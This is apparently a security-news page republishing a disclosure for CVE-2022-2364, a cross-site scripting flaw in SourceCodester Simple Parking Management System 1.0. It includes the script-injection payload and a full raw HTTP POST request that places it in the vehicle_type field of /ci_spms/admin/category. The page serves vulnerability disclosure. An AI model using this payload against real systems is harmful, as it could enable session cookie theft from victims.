Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-2364: CVE/POC.md at eea3090b960da014312f7ad4b09aa58d23966d77 · CyberThoth/CVE

A vulnerability, which was classified as problematic, was found in SourceCodester Simple Parking Management System 1.0. This affects an unknown part of the file /ci_spms/admin/category. The manipulation of the argument vehicle_type with the input "><script>alert(“XSS”)</script> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

CVE
#xss#vulnerability#web#windows#apple#chrome#webkit

An attacker could steal cookies with a crafted URL sent to the victims.

POST /ci_spms/admin/category HTTP/1.1
Host: localhost
Content-Length: 130
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/ci_spms/admin/category
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ci_session=81rl2n6fdvfm0jukf6uehmqffaptj876
Connection: close

parking_area_no=2&vehicle_type=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&vehicle_limit=15&parking_charge=4&send=Submit

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907